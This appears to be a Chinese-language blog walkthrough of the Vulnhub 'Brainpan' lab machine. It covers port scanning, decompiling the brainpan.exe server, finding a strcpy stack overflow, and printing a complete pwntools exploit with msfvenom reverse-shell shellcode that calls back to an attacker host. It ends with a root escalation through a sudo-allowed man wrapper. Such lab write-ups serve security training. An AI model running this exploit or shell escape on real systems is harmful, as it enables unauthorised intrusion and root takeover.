Brainpan
|
805
|
0

994 字
|
27 分钟

Brainpan

主机发现

nmap -sn 192.168.65.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-23 16:02 中国标准时间
Nmap scan report for 192.168.65.1
Host is up (0.0020s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.65.2
Host is up (0.0011s latency).
MAC Address: 00:50:56:EB:B8:29 (VMware)
Nmap scan report for 192.168.65.137
Host is up (0.00s latency).
MAC Address: 00:0C:29:83:FD:67 (VMware)
Nmap scan report for 192.168.65.254
Host is up (0.0011s latency).
MAC Address: 00:50:56:FD:72:65 (VMware)
Nmap scan report for 192.168.65.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.15 seconds

端口扫描

nmap --min-rate 10000 -p- 192.168.65.137 -oA nmapscan/ports
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-23 16:03 中国标准时间
Nmap scan report for 192.168.65.137
Host is up (0.0019s latency).
Not shown: 65533 closed tcp ports (reset)
PORT      STATE SERVICE
9999/tcp  open  abyss
10000/tcp open  snet-sensor-mgmt
MAC Address: 00:0C:29:83:FD:67 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.01 seconds

TCP

nmap -sT -sV -sC -O -p 9999,10000 192.168.65.137 -oA nmapscan/detail
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-23 16:04 中国标准时间
Nmap scan report for 192.168.65.137
Host is up (0.00096s latency).

PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
| fingerprint-strings:
|   NULL:
|     _| _|
|     _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
|     _|_| _| _| _| _| _| _| _| _| _| _| _|
|     _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
|     [________________________ WELCOME TO BRAINPAN _________________________]
|_    ENTER THE PASSWORD
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.94%I=7%D=1/23%Time=65AF7330%P=i686-pc-windows-windows%
SF:r(NULL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\
SF:|_\|\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\
SF:x20\x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_
SF:\|\x20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_
SF:\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_
SF:\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x2
SF:0_\|\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x
SF:20\x20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\
SF:x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x
SF:20\x20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINP
SF:AN\x20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENT
SF:ER\x20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:n\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");
MAC Address: 00:0C:29:83:FD:67 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.21 seconds

UDP

nmap -sU -p 9999,10000 192.168.65.137 -oA nmapscan/udp
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-23 16:08 中国标准时间
Nmap scan report for 192.168.65.137
Host is up (0.00089s latency).

PORT      STATE  SERVICE
9999/udp  closed distinct
10000/udp closed ndmp
MAC Address: 00:0C:29:83:FD:67 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds

Nmap漏洞扫描

nmap --script=vuln -p 9999,10000 192.168.65.137 -oA nmapscan/vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-26 11:30 中国标准时间
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.65.137
Host is up (0.0010s latency).

PORT      STATE SERVICE
9999/tcp  open  abyss
10000/tcp open  snet-sensor-mgmt
MAC Address: 00:0C:29:83:FD:67 (VMware)

渗透思路

9999端口

nc连接下这个服务看看

nc 192.168.65.137 9999
_|                            _|
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD

                          >> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
                          ACCESS DENIED

提示输入密码,错误直接拒接

Web渗透

HTTP服务访问

一张图片,无其他链接

目录爆破

没啥收获,扫个目录看看

gobuster dir -u http://192.168.65.137:10000 --wordlist=D:\Global\apps\SecLists\current\Discovery\Web-Content\raft-large-directories.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.65.137:10000
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                D:\Global\apps\SecLists\current\Discovery\Web-Content\raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2024/01/26 11:37:48 Starting gobuster in directory enumeration mode
===============================================================
/bin                  (Status: 301) [Size: 0] [--> /bin/]
Progress: 23082 / 62285 (37.06%)[ERROR] 2024/01/26 11:37:58 [!] parse "http://192.168.65.137:10000/error\x1f_log": net/url: invalid control character in URL
Progress: 62284 / 62285 (100.00%)
===============================================================
2024/01/26 11:38:15 Finished
===============================================================

多了个路径,访问看看

下载看看

file ./brainpan.exe 
brainpan.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows

32位可执行程序,执行看看结果

./brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.

创建了socket服务,并绑定在9999端口,与端口扫描的一致

Pwn

用IDA打开看看

main函数如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  void *v3; // esp
  int v4; // eax
  int v5; // eax
  int v6; // eax
  int v7; // eax
  int v8; // eax
  int v9; // eax
  int v10; // eax
  struct sockaddr addr; // [esp+30h] [ebp-5D8h] BYREF
  struct sockaddr name; // [esp+40h] [ebp-5C8h] BYREF
  SOCKET v14; // [esp+58h] [ebp-5B0h]
  SOCKET s; // [esp+5Ch] [ebp-5ACh]
  struct WSAData WSAData; // [esp+60h] [ebp-5A8h] BYREF
  int v17; // [esp+1F8h] [ebp-410h]
  int v18; // [esp+1FCh] [ebp-40Ch]
  int addrlen; // [esp+200h] [ebp-408h] BYREF
  char *v20; // [esp+204h] [ebp-404h]
  char *v21; // [esp+208h] [ebp-400h]
  char *Str; // [esp+20Ch] [ebp-3FCh]
  char buf[1016]; // [esp+210h] [ebp-3F8h] BYREF

  v3 = alloca(16);
  __main();
  Str = "_|                            _|                                        \n"
        "_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  \n"
        "_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|\n"
        "_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|\n"
        "_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|\n"
        "                                            _|                          \n"
        "                                            _|\n"
        "\n"
        "[________________________ WELCOME TO BRAINPAN _________________________]\n"
        "                          ENTER THE PASSWORD                              \n"
        "\n"
        "                          >> ";
  v21 = "                          ACCESS DENIED\n";
  v20 = "                          ACCESS GRANTED\n";
  v18 = 9999;
  v17 = 1;
  printf("[+] initializing winsock...");
  if ( WSAStartup(0x202u, &WSAData) )
  {
    v4 = WSAGetLastError();
    printf("[!] winsock init failed: %d", v4);
  }
  else
  {
    printf("done.\n");
    s = socket(2, 1, 0);
    if ( s == -1 )
    {
      v5 = WSAGetLastError();
      printf("[!] could not create socket: %d", v5);
    }
    printf("[+] server socket created.\n");
    name.sa_family = 2;
    *(_DWORD *)&name.sa_data[2] = 0;
    *(_WORD *)name.sa_data = htons(0x270Fu);
    if ( bind(s, &name, 16) == -1 )
    {
      v6 = WSAGetLastError();
      printf("[!] bind failed: %d", v6);
    }
    printf("[+] bind done on port %d\n", v18);
    listen(s, 3);
    printf("[+] waiting for connections.\n");
    addrlen = 16;
    while ( 1 )
    {
      v14 = accept(s, &addr, &addrlen);
      if ( v14 == -1 )
        break;
      printf("[+] received connection.\n");
      memset(buf, 0, 0x3E8u);
      v7 = strlen(Str);
      send(v14, Str, v7, 0);
      recv(v14, buf, 1000, 0);
      v17 = get_reply(buf);
      printf("[+] check is %d\n", v17);
      if ( get_reply(buf) )
      {
        v9 = strlen(v20);
        send(v14, v21, v9, 0);
      }
      else
      {
        v8 = strlen(v21);
        send(v14, v20, v8, 0);
      }
      closesocket(v14);
    }
    v10 = WSAGetLastError();
    printf("[!] accept failed: %d", v10);
  }
  return 1;
}

有个winkwink函数

void winkwink()
{
  __asm { jmp     esp }
}

重点在get_reply函数处

int __cdecl get_reply(char *Source)
{
  size_t v1; // eax
  char Destination[520]; // [esp+10h] [ebp-208h] BYREF

  printf("[get_reply] s = [%s]\n", Source);
  strcpy(Destination, Source);
  v1 = strlen(Destination);
  printf("[get_reply] copied %d bytes to buffer\n", v1);
  return strcmp(Destination, "shitstorm\n");
}

流程分析

  • get_reply函数调用strcpy函数将形参Source的值拷贝给局部变量Destination
  • 形参Source来自于上层调用函数main函数的局部变量buf
  • main函数通过调用recv可向局部变量buf中写入1000byte的数据
  • get_reply函数中的局部变量Destination长度为520byte
  • 1000->520,形成了栈溢出漏洞

首先生成padding

kali@kali ~/Desktop> cyclic 1000
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaaj

使用IDA本地调试下程序,使用nc将生成的padding传入程序

nc localhost 9999
_|                            _|
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD

                          >> aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaaj

可以发现IDA下方出现报错,此时EIP的值为0x66616167

66616167: The instruction at 0x66616167 referenced memory at 0x66616167. The memory could not be executed -> 66616167 (exc.code c0000005, tid 12316)
kali@kali ~/Desktop> cyclic -l 0x66616167
524

同样使用cyclic工具(需提前安装pwntools)计算出偏移值为524

利用脚本

使用msfvenom生成payload

msfvenom -p linux/x86/shell_reverse_tcp -b "\x00" LHOST=192.168.65.134 LPORT=4444 -f python
D:/Global/apps/metasploit-framework/6.3.35-20230919103440/embedded/lib/ruby/gems/3.0.0/gems/rex-core-0.1.31/lib/rex/compat.rb:381: warning: Win32API is deprecated after Ruby 1.9.1; use fiddle directly instead
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of python file: 479 bytes
buf =  b""
buf += b"\xb8\x5a\xa7\x13\x8b\xda\xc8\xd9\x74\x24\xf4\x5b"
buf += b"\x33\xc9\xb1\x12\x83\xc3\x04\x31\x43\x0e\x03\x19"
buf += b"\xa9\xf1\x7e\xac\x6e\x02\x63\x9d\xd3\xbe\x0e\x23"
buf += b"\x5d\xa1\x7f\x45\x90\xa2\x13\xd0\x9a\x9c\xde\x62"
buf += b"\x93\x9b\x19\x0a\xe4\xf4\x9b\x4c\x8c\x06\x1c\x41"
buf += b"\x11\x8e\xfd\xd1\xcf\xc0\xac\x42\xa3\xe2\xc7\x85"
buf += b"\x0e\x64\x85\x2d\xff\x4a\x59\xc5\x97\xbb\xb2\x77"
buf += b"\x01\x4d\x2f\x25\x82\xc4\x51\x79\x2f\x1a\x11"

使用winkwink函数提供的jmp esp来控制程序执行流,该指令地址为0x311712F3

from pwn import *
context(os='linux', arch='i386', log_level='debug')
io = remote('192.168.65.137', 9999)
padding = 524
jmp_esp = 0x311712F3
buf = b"\xb8\x5a\xa7\x13\x8b\xda\xc8\xd9\x74\x24\xf4\x5b"
buf += b"\x33\xc9\xb1\x12\x83\xc3\x04\x31\x43\x0e\x03\x19"
buf += b"\xa9\xf1\x7e\xac\x6e\x02\x63\x9d\xd3\xbe\x0e\x23"
buf += b"\x5d\xa1\x7f\x45\x90\xa2\x13\xd0\x9a\x9c\xde\x62"
buf += b"\x93\x9b\x19\x0a\xe4\xf4\x9b\x4c\x8c\x06\x1c\x41"
buf += b"\x11\x8e\xfd\xd1\xcf\xc0\xac\x42\xa3\xe2\xc7\x85"
buf += b"\x0e\x64\x85\x2d\xff\x4a\x59\xc5\x97\xbb\xb2\x77"
buf += b"\x01\x4d\x2f\x25\x82\xc4\x51\x79\x2f\x1a\x11"
nop = b"\x90"
payload = flat(['a'*padding, jmp_esp])
payload += nop * 16 # 插入一定长度的nop指令,防止shellcode被覆盖掉
payload += buf
io.recvuntil(">>")
io.sendline(payload)

反弹shell

开启nc监听,执行利用脚本,等待shell连接

user@ubuntu ~/Desktop [SIGINT]> nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.65.137 39127
python -c "import pty;pty.spawn('/bin/bash')"
puck@brainpan:/home/puck$ whoami
whoami
puck
puck@brainpan:/home/puck$

主机信息搜集

puck@brainpan:/home/puck$ uname -a
uname -a
Linux brainpan 3.5.0-25-generic #39-Ubuntu SMP Mon Feb 25 19:02:34 UTC 2013 i686 i686 i686 GNU/Linux
puck@brainpan:/home/puck$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home/puck$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash
puck@brainpan:/home/puck$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
puck@brainpan:/home/puck$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
puck@brainpan:/home/puck$ cat /proc/version
cat /proc/version
Linux version 3.5.0-25-generic (buildd@lamiak) (gcc version 4.7.2 (Ubuntu/Linaro 4.7.2-2ubuntu1) ) #39-Ubuntu SMP Mon Feb 25 19:02:34 UTC 2013
puck@brainpan:/home/puck$

权限提升

python -c "import pty;pty.spawn('/bin/bash')"
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util
sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
  - network
  - proclist
  - manual [command]

像是手动执行命令的

puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual date
sudo /home/anansi/bin/anansi_util manual date
No manual entry for manual
WARNING: terminal is not fully functional
-  (press RETURN)
DATE(1)                          User Commands                         DATE(1)

NAME
       date - print or set the system date and time

SYNOPSIS
       date [OPTION]... [+FORMAT]
       date [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]]

DESCRIPTION
       Display the current time in the given FORMAT, or set the system date.

       -d, --date=STRING
              display time described by STRING, not `now'

       -f, --file=DATEFILE
              like --date once for each line of DATEFILE

       -r, --reference=FILE
              display the last modification time of FILE

       -R, --rfc-2822
              output  date  and time in RFC 2822 format.  Example: Mon, 07 Aug
 Manual page date(1) line 1 (press h for help or q to quit)q
puck@brainpan:/home/puck$ 
puck@brainpan:/home/puck$ man date
man date
WARNING: terminal is not fully functional
-  (press RETURN)
DATE(1)                          User Commands                         DATE(1)

NAME
       date - print or set the system date and time

SYNOPSIS
       date [OPTION]... [+FORMAT]
       date [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]]

DESCRIPTION
       Display the current time in the given FORMAT, or set the system date.

       -d, --date=STRING
              display time described by STRING, not `now'

       -f, --file=DATEFILE
              like --date once for each line of DATEFILE

       -r, --reference=FILE
              display the last modification time of FILE

       -R, --rfc-2822
              output  date  and time in RFC 2822 format.  Example: Mon, 07 Aug
 Manual page date(1) line 1 (press h for help or q to quit)q

效果和man一模一样

查看GTFOBinse二进制漏洞清单,man指令可用于sudo提权,依葫芦画瓢用一下

puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual man
sudo /home/anansi/bin/anansi_util manual man
No manual entry for manual
WARNING: terminal is not fully functional
-  (press RETURN)!/bin/bash
!/bin/bash
root@brainpan:/usr/share/man# whoami
whoami
root

提权成功

flag

root@brainpan:/usr/share/man# cd /root
cd /root
root@brainpan:~# ls
ls
b.txt
root@brainpan:~# cat b.txt
cat b.txt
_|                            _|                                        
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                          
                                            _|

                                              http://www.techorganic.com 

root@brainpan:~#
PwnVulnhubWeb
暂无评论

发送评论 编辑评论 



























































































|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	




颜文字
Emoji
小恐龙
花!
	


									














上一篇
下一篇